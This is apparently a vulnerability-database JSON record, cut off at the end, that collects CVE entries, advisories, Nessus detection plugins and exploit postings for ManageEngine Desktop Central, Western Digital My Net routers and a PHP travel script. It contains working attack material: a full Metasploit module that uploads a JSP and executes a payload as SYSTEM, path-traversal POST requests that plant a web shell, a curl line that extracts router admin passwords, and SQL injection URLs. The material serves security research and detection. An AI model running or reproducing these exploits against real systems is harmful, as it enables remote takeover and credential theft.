{"cve": [{"lastseen": "2019-05-29T18:15:33", "bulletinFamily": "NVD", "description": "Brave Browser before 0.13.0 allows a tab to close itself even if the tab was not opened by a script, resulting in denial of service.", "modified": "2018-05-10T13:28:00", "id": "CVE-2016-10718", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10718", "published": "2018-04-04T02:29:00", "title": "CVE-2016-10718", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:47", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in ZOHO ManageEngine Desktop Central (DC) before 9 build 90055 allows remote attackers to execute arbitrary code via a .. (dot dot) in the fileName parameter to mdm/mdmLogUploader.", "modified": "2014-10-24T14:12:00", "id": "CVE-2014-5006", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5006", "published": "2014-10-21T15:55:00", "title": "CVE-2014-5006", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:13:05", "bulletinFamily": "NVD", "description": "main_internet.php on the Western Digital My Net N600 and N750 with firmware 1.03.12 and 1.04.16, and the N900 and N900C with firmware 1.05.12, 1.06.18, and 1.06.28, allows remote attackers to discover the cleartext administrative password by reading the \"var pass=\" line within the HTML source code.", "modified": "2017-08-29T01:33:00", "id": "CVE-2013-5006", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5006", "published": "2013-07-31T13:20:00", "title": "CVE-2013-5006", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-01-02T01:08:38", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-03-11T00:00:00", "published": "2017-03-11T00:00:00", "href": "https://0day.today/exploit/description/27288", "id": 
"1337DAY-ID-27288", "type": "zdt", "title": "Travel Tours Script 2.0 - SQL Injection Vulnerability", "sourceData": "# # # # # \r\n# Exploit Title: Travel Tours Script v2.0 - SQL Injection\r\n# Google Dork: N/A\r\n# Date: 11.03.2017\r\n# Vendor Homepage: https://www.phpjabbers.com/\r\n# Software: https://www.phpjabbers.com/travel-tours-script/\r\n# Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1\r\n# Version: 2.0\r\n# Tested on: Win7 x64, Kali Linux x64\r\n# # # # # \r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Mail: ihsan[@]ihsan[.]net\r\n# # # # #\r\n# SQL Injection/Exploit :\r\n# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&sortby=stars&direction=[SQL]&listing_search=1&type=[SQL]&rating_from=[SQL]&rating_to=[SQL]&price_from=[SQL]&price_to=[SQL]\r\n# Etc..\r\n# # # # #\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/27288", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-10T15:29:58", "bulletinFamily": "exploit", "description": "ManageEngine Desktop Central suffers from code execution and remote shell upload vulnerabilities.", "modified": "2014-09-01T00:00:00", "published": "2014-09-01T00:00:00", "id": "1337DAY-ID-22570", "href": "https://0day.today/exploit/description/22570", "type": "zdt", "title": "ManageEngine Desktop Central - Arbitrary File Upload / RCE Vulnerabilities", "sourceData": "Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP\r\nDiscovered by Pedro Ribeiro Agile Information Security\r\n=================================================================================\r\n \r\nBackground on the affected product:\r\n\"Desktop Central is an integrated desktop & mobile device management\r\nsoftware that helps in managing the servers, laptops, desktops,\r\nsmartphones and tablets from a central point. 
It automates your\r\nregular desktop management routines like installing patches,\r\ndistributing software, managing your IT Assets, managing software\r\nlicenses, monitoring software usage statistics, managing USB device\r\nusage, taking control of remote desktops, and more.\"\r\n \r\nThere are several vulnerable servers are out there if you know the\r\nGoogle dorks. Quoting the author of the Internet Census 2012: \"As a\r\nrule of thumb, if you believe that \"nobody would connect that to the\r\nInternet, really nobody\", there are at least 1000 people who did.\"\r\nThese vulnerabilities can be abused to achieve remote code execution\r\nas SYSTEM in Windows. I've updated the desktopcentral_file_upload\r\nMetasploit module to use the new statusUpdate technique. Needless to\r\nsay, owning a Desktop Central box will give you control of all the\r\ncomputers and smartphones it manages.\r\n \r\nTechnical details:\r\n#1\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: none; no authentication or any other information needed\r\n \r\na)\r\nCVE-2014-5005\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1\r\n<... your favourite jsp shell here ...>\r\n \r\nb)\r\nCVE-2014-5006\r\nAffected versions: all versions from v8 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /mdm/mdmLogUploader?filename=..\\\\..\\\\..\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... 
your favourite jsp shell here ...>\r\n \r\n \r\n#2\r\nCVE-2014-5007\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: no authentication needed; need to know valid\r\ncomputerName, domainName and customerId\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nNotes: This was previously discovered as CVE-2013-7390 / OSVDB-10008\r\nby Thomas Hibbert, and was \"fixed\" in 2013-11-09. The fix is\r\nincomplete and it is still possible to upload a shell with a valid\r\ncomputerName, domainName and customerId.\r\n \r\nPOST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... your favourite jsp shell here ...>\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22570"}, {"lastseen": "2018-03-19T02:09:21", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2013-08-03T00:00:00", "published": "2013-08-03T00:00:00", "id": "1337DAY-ID-21060", "href": "https://0day.today/exploit/description/21060", "type": "zdt", "title": "Western Digital My Net Wireless Routers - Password Disclosure", "sourceData": "Vulnerable Systems:\r\nWestern Digital My Net Series Wireless Routers:\r\nN600 Firmware 1.03.12\r\nN600 Firmware 1.04.16\r\n \r\nN750 Firmware 1.03.12\r\nN750 Firmware 1.04.16\r\n \r\nN900 Firmware 1.05.12\r\nN900 Firmware 1.06.18\r\nN900 Firmware 1.06.28\r\n \r\nN900C Firmware 1.05.12\r\nN900C Firmware 1.06.18\r\nN900C Firmware 1.06.28\r\n \r\nCVE 2013-5006\r\nCWE-256 Plaintext Storage of a Password\r\nCVSS Base Score 4.3\r\nCVSS Impact Subscore 2.9\r\nCvss Expoit Score 8.6\r\n(AV:N/AC:M/Au:N/C:P/I:N/A:N/E:POC/RL:U/RC:UR/CDP:H/TD:H/CR:H/IR:H/AR:H)\r\n \r\nProof of concept:\r\ncurl -s 
http://<IP>:8080/main_internet.php? | egrep -i 'var pass'\r\n \r\nwhich will give an output similar to this ex:\r\nvar pass=\"\";\r\n \r\nDetails:\r\nBy sending a specially crafted command to the affected routers, the clear text password for the admin account can be extracted, with no authentication required to access the page where it is stored.\r\n \r\nDuring the initial setup of these four routers with the affected firmware, the admin password is stored in clear text on the main_internet.php? source code page as the value for 'var pass'. For this bug to exploitable from a remote network attack, UPnP and remote administrative access (port 8080 is set by default) must be enabled.\r\n \r\nThe vendor has not responded to any inquiries concerning the bug.\r\n \r\nExternal Sources:\r\nOSVDB - http://www.osvdb.org/show/osvdb/95519\r\nCVE-Mitre - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006\r\nIBM xforce - http://xforce.iss.net/xforce/xfdb/85903\r\nBugtraq/SecList - http://www.securityfocus.com/archive/1/527433\r\nSecurity Database - http://www.security-database.com/detail.php?alert=CVE-2013-5006\r\n \r\nVendor's Network Router Product Pages:\r\nhttp://www.wdc.com/en/products/network/routers/\r\nhttp://support.wdc.com/download/notes/My_Net_N900C_FW_Release_Notes_1.07.16.pdf?v=9564\r\nhttp://support.wdc.com/download/notes/My_Net_N900_FW_Release_Notes_1.07.16.pdf?v=7436\r\nhttp://support.wdc.com/download/notes/My_Net_N750_FW_Release_Notes_1_04_16.pdf?v=6879\r\nhttp://support.wdc.com/download/notes/My_Net_N600_FW_Release_Notes_1_04_16.pdf?v=4950\r\n \r\nAdditional Notes/Fixes/Workarounds:\r\n \r\nFirmware notes: N900 and N900C with firmware 1.07.16 released on 05/2013 fixes the bug. It is advised that users with the N900 or N900C upgrade to 1.07.16. Earlier firmware releases of 1.02.02, 1.03.11 and 1.04.08 are unaffected.\r\n \r\nN600 and N750 with the earlier firmware 1.01.04 and 1.01.20 are unaffected by this bug. Firmware 1.02.08 was not tested. 
The 'workaround' for these two model routers, which will only stop network side attacks, is for the end user to disable remote administrative access capabilities.\r\n \r\nDiscovered - 07-02-2013\r\nUpdated - 07-31-2013\r\nResearch Contact - K Lovett\r\nAffiliation - SUSnet\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/21060"}], "zdi": [{"lastseen": "2016-11-09T00:18:00", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine Desktop Central MSP. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the MDMLogUploaderServlet servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "modified": "2015-11-09T00:00:00", "published": "2015-04-29T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-15-163", "id": "ZDI-15-163", "title": "ManageEngine Desktop Central MSP MDMLogUploaderServlet filename File Upload Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-23T11:32:16", "bulletinFamily": "scanner", "description": "The version of ManageEngine Desktop Central running on the remote host\nis affected by the following file upload vulnerabilities that allow\nthe execution of arbitrary code by a remote attacker :\n\n - A failure to validate the ", "modified": "2019-11-02T00:00:00", "id": "MANAGEENGINE_DESKTOP_CENTRAL_90055_RCE_SAFE.NASL", "href": "https://www.tenable.com/plugins/nessus/82079", "published": "2015-03-25T00:00:00", "title": "ManageEngine Desktop Central Arbitrary File Upload and RCE (Safe Check)", "type": "nessus", "sourceData": "#\n# (C) 
Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82079);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2014-5005\", \"CVE-2014-5006\", \"CVE-2014-5007\");\n script_bugtraq_id(69491, 69493, 69494);\n script_xref(name:\"EDB-ID\", value:\"34594\");\n\n script_name(english:\"ManageEngine Desktop Central Arbitrary File Upload and RCE (Safe Check)\");\n script_summary(english:\"Checks the version of ManageEngine Desktop Central.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine Desktop Central running on the remote host\nis affected by the following file upload vulnerabilities that allow\nthe execution of arbitrary code by a remote attacker :\n\n - A failure to validate the 'filename' parameter of the\n 'statusUpdate' servlet when performing a 'LFU' action.\n (CVE-2014-5005)\n\n - A failure to validate the 'filename' parameter of the\n 'mdmLogUploader' servlet. (CVE-2014-5006)\n\n - A failure to validate the 'filename' parameter of the\n 'agentLogUploader' servlet. This flaw was previously\n identified by CVE-2013-7390 and reported as fixed in\n version 8 build 80293; however, the fix was incomplete,\n and a method for bypassing it was discovered and\n re-reported. 
(CVE-2014-5007)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-15-006/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Aug/88\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 9 build 90055 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-5006\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"ManageEngine Desktop Central 9.0.0 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine Desktop Central StatusUpdate Arbitrary File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8020);\n\ninstall = get_single_install(\n app_name : appname,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\nbuild = install[\"build\"];\nismsp = install[\"MSP\"];\nrep_version = version;\nif(build != UNKNOWN_VER)\n rep_version += \" Build \"+build;\ninstall_url = build_url(port:port, qs:dir);\n\n# 7 - 9 build 90055\nif (version !~ \"^[7-9](\\.|$)\")\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n\nif (version =~ \"^9(\\.|$)\" && build == UNKNOWN_VER)\n exit(0, \"The build number of \"+appname+\" version \" +rep_version+ \" listening at \" +install_url+ \" could not be determined.\");\n\nif (int(build) < 90055)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + rep_version +\n '\\n Fixed version : 9 Build 90055' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:38:40", "bulletinFamily": "scanner", "description": "The web server for the Western Digital My Net router identified is\naffected by an information disclosure vulnerability. 
The admin password\nis stored in plaintext as the value for ", "modified": "2019-11-02T00:00:00", "id": "WD_MY_NET_PASSWORD_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/69370", "published": "2013-08-15T00:00:00", "title": "Western Digital My Net Router main_internet.php Admin Credential Disclosure", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69370);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_cve_id(\"CVE-2013-5006\");\n script_bugtraq_id(61361);\n script_xref(name:\"EDB-ID\", value:\"27288\");\n\n script_name(english:\"Western Digital My Net Router main_internet.php Admin Credential Disclosure\");\n script_summary(english:\"Tries to retrieve admin credentials\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains an application that is affected by an\ninformation disclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The web server for the Western Digital My Net router identified is\naffected by an information disclosure vulnerability. The admin password\nis stored in plaintext as the value for 'var pass'. This can be found\nin the source code for the 'main_internet.php' page. An\nunauthenticated, remote attacker could gain access to the login\ncredentials by sending a request to an affected device.\n\nNote that in order for this issue to be exploited, UPnP and remote\nadministrative access must be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Jul/132\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.wdc.com/wdproducts/updates/?family=wdfmynetn900\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Users of N900 and N900C devices should update the firmware to version\n1.07.16 or later. 
For other affected devices, please refer to the\nvendor for upgrade options. Some sources suggest disabling remote\nadministrative access and disable UPnP as possible mitigation steps in\nthe event no upgrade option is available.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:wdc:mynet_firmware\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:8080, embedded:TRUE);\nurl = \"/main_internet.php\";\n\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : url,\n exit_on_fail : TRUE\n);\n\n# Does it look like My Net\nif (\n \"<title>WESTERN DIGITAL, INC. 
| WIRELESS ROUTER | HOME\" >!< res[2] &&\n 'LoginSubmit: function' >!< res[2]\n) audit(AUDIT_NOT_DETECT, \"A Western Digital My Net router\", port);\n\n\nif ('var pass=\"' >< res[2])\n{\n # Extract Admin password\n pass = \"\";\n pat = 'var pass=\"([^\"]*)\"';\n match = eregmatch(pattern:pat, string:res[2]);\n if (!isnull(match))\n {\n pass = match[1];\n # Mask all but first and last character\n pass = pass[0] + crap(data:\"*\", length:6) + pass[strlen(pass)-1];\n }\n\n if (report_verbosity > 0)\n {\n header = 'Nessus was able to verify the issue with the following URL';\n trailer = 'And was able to determine the admin password is : \"'+pass+'\".' +\n '\\n\\nNote : All but the first and last characters have been masked.';\n\n report = get_vuln_report(\n items : url,\n port : port,\n header : header,\n trailer : trailer\n );\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, \"Western Digital My Net\", build_url(port:port, qs:url));\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T23:32:14", "bulletinFamily": "exploit", "description": "ManageEngine Desktop Central StatusUpdate Arbitrary File Upload. CVE-2014-5005. 
Remote exploit for windows platform", "modified": "2014-09-09T00:00:00", "published": "2014-09-09T00:00:00", "id": "EDB-ID:34594", "href": "https://www.exploit-db.com/exploits/34594/", "type": "exploitdb", "title": "ManageEngine Desktop Central StatusUpdate Arbitrary File Upload", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ManageEngine Desktop Central StatusUpdate Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral\r\n v7 to v9 build 90054 (including the MSP versions).\r\n A malicious user can upload a JSP file into the web root without authentication, leading to\r\n arbitrary code execution as SYSTEM. 
Some early builds of version 7 are not exploitable as\r\n they do not ship with a bundled Java compiler.\r\n },\r\n 'Author' =>\r\n [\r\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-5005'],\r\n ['OSVDB', '110643'],\r\n ['URL', 'http://seclists.org/fulldisclosure/2014/Aug/88'],\r\n ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc9_file_upload.txt']\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Desktop Central v7 to v9 build 90054 / Windows', {} ]\r\n ],\r\n 'Privileged' => true,\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Aug 31 2014'\r\n ))\r\n\r\n register_options([Opt::RPORT(8020)], self.class)\r\n end\r\n\r\n\r\n # Test for Desktop Central\r\n def check\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(\"configurations.do\"),\r\n 'method' => 'GET'\r\n })\r\n\r\n if res && res.code == 200\r\n build = nil\r\n\r\n if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||\r\n res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7\r\n\r\n print_status(\"#{peer} - Detected Desktop Central v7\")\r\n elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||\r\n res.body.to_s =~ /ManageEngine Desktop Central MSP 8/\r\n\r\n if res.body.to_s =~ /id=\"buildNum\" value=\"([0-9]+)\"\\/>/ # DC v8 (later versions)\r\n build = $1\r\n print_status(\"#{peer} - Detected Desktop Central v8 #{build}\")\r\n else # DC v8 (earlier versions)\r\n print_status(\"#{peer} - Detected Desktop Central v8\")\r\n end\r\n elsif res.body.to_s =~ /id=\"buildNum\" value=\"([0-9]+)\"\\/>/ # DC v9 (and higher?)\r\n build = $1\r\n end\r\n\r\n if build.nil?\r\n return Exploit::CheckCode::Unknown\r\n elsif Gem::Version.new(build) < Gem::Version.new(\"90055\")\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Unknown\r\n end\r\n\r\n 
def exploit\r\n print_status(\"#{peer} - Uploading JSP to execute the payload\")\r\n\r\n exe = payload.encoded_exe\r\n exe_filename = rand_text_alpha_lower(8) + \".exe\"\r\n\r\n jsp_payload = jsp_drop_and_execute(exe, exe_filename)\r\n jsp_name = rand_text_alpha_lower(8) + \".jsp\"\r\n\r\n send_request_cgi({\r\n 'uri' => normalize_uri('statusUpdate'),\r\n 'method' => 'POST',\r\n 'data' => jsp_payload,\r\n 'ctype' => 'text/html',\r\n 'vars_get' => {\r\n 'actionToCall' => 'LFU',\r\n 'configDataID' => '1',\r\n 'customerId' => rand_text_numeric(4),\r\n 'fileName' => '../' * 6 << jsp_name\r\n }\r\n })\r\n # We could check for HTTP 200 and a \"success\" string.\r\n # However only some later v8 and v9 versions return this; and we don't really care\r\n # and do a GET to the file we just uploaded anyway.\r\n\r\n register_files_for_cleanup(exe_filename)\r\n register_files_for_cleanup(\"..\\\\webapps\\\\DesktopCentral\\\\#{jsp_name}\")\r\n\r\n print_status(\"#{peer} - Executing payload\")\r\n send_request_cgi(\r\n {\r\n 'uri' => normalize_uri(jsp_name),\r\n 'method' => 'GET'\r\n })\r\n end\r\n\r\n\r\n def jsp_drop_bin(bin_data, output_file)\r\n jspraw = %Q|<%@ page import=\"java.io.*\" %>\\n|\r\n jspraw << %Q|<%\\n|\r\n jspraw << %Q|String data = \"#{Rex::Text.to_hex(bin_data, \"\")}\";\\n|\r\n\r\n jspraw << %Q|FileOutputStream outputstream = new FileOutputStream(\"#{output_file}\");\\n|\r\n\r\n jspraw << %Q|int numbytes = data.length();\\n|\r\n\r\n jspraw << %Q|byte[] bytes = new byte[numbytes/2];\\n|\r\n jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\\n|\r\n jspraw << %Q|{\\n|\r\n jspraw << %Q| char char1 = (char) data.charAt(counter);\\n|\r\n jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\\n|\r\n jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\\n|\r\n jspraw << %Q| comb <<= 4;\\n|\r\n jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\\n|\r\n jspraw << %Q| bytes[counter/2] = (byte)comb;\\n|\r\n jspraw << %Q|}\\n|\r\n\r\n 
jspraw << %Q|outputstream.write(bytes);\\n|\r\n jspraw << %Q|outputstream.close();\\n|\r\n jspraw << %Q|%>\\n|\r\n\r\n jspraw\r\n end\r\n\r\n\r\n def jsp_execute_command(command)\r\n jspraw = %Q|\\n|\r\n jspraw << %Q|<%\\n|\r\n jspraw << %Q|Runtime.getRuntime().exec(\"#{command}\");\\n|\r\n jspraw << %Q|%>\\n|\r\n\r\n jspraw\r\n end\r\n\r\n\r\n def jsp_drop_and_execute(bin_data, output_file)\r\n jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34594/"}, {"lastseen": "2016-02-03T23:24:34", "bulletinFamily": "exploit", "description": "ManageEngine Desktop Central - Arbitrary File Upload / RCE. CVE-2013-7390,CVE-2014-5005,CVE-2014-5006,CVE-2014-5007. Webapps exploit for jsp platform", "modified": "2014-09-01T00:00:00", "published": "2014-09-01T00:00:00", "id": "EDB-ID:34518", "href": "https://www.exploit-db.com/exploits/34518/", "type": "exploitdb", "title": "ManageEngine Desktop Central - Arbitrary File Upload / RCE", "sourceData": "Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP\r\nDiscovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\n\r\nBackground on the affected product:\r\n\"Desktop Central is an integrated desktop & mobile device management\r\nsoftware that helps in managing the servers, laptops, desktops,\r\nsmartphones and tablets from a central point. It automates your\r\nregular desktop management routines like installing patches,\r\ndistributing software, managing your IT Assets, managing software\r\nlicenses, monitoring software usage statistics, managing USB device\r\nusage, taking control of remote desktops, and more.\"\r\n\r\nThere are several vulnerable servers are out there if you know the\r\nGoogle dorks. 
Quoting the author of the Internet Census 2012: \"As a\r\nrule of thumb, if you believe that \"nobody would connect that to the\r\nInternet, really nobody\", there are at least 1000 people who did.\"\r\nThese vulnerabilities can be abused to achieve remote code execution\r\nas SYSTEM in Windows. I've updated the desktopcentral_file_upload\r\nMetasploit module to use the new statusUpdate technique. Needless to\r\nsay, owning a Desktop Central box will give you control of all the\r\ncomputers and smartphones it manages.\r\n\r\nTechnical details:\r\n#1\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: none; no authentication or any other information needed\r\n\r\na)\r\nCVE-2014-5005\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1\r\n<... your favourite jsp shell here ...>\r\n\r\nb)\r\nCVE-2014-5006\r\nAffected versions: all versions from v8 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /mdm/mdmLogUploader?filename=..\\\\..\\\\..\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... your favourite jsp shell here ...>\r\n\r\n\r\n#2\r\nCVE-2014-5007\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: no authentication needed; need to know valid\r\ncomputerName, domainName and customerId\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nNotes: This was previously discovered as CVE-2013-7390 / OSVDB-10008\r\nby Thomas Hibbert, and was \"fixed\" in 2013-11-09. The fix is\r\nincomplete and it is still possible to upload a shell with a valid\r\ncomputerName, domainName and customerId.\r\n\r\nPOST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... 
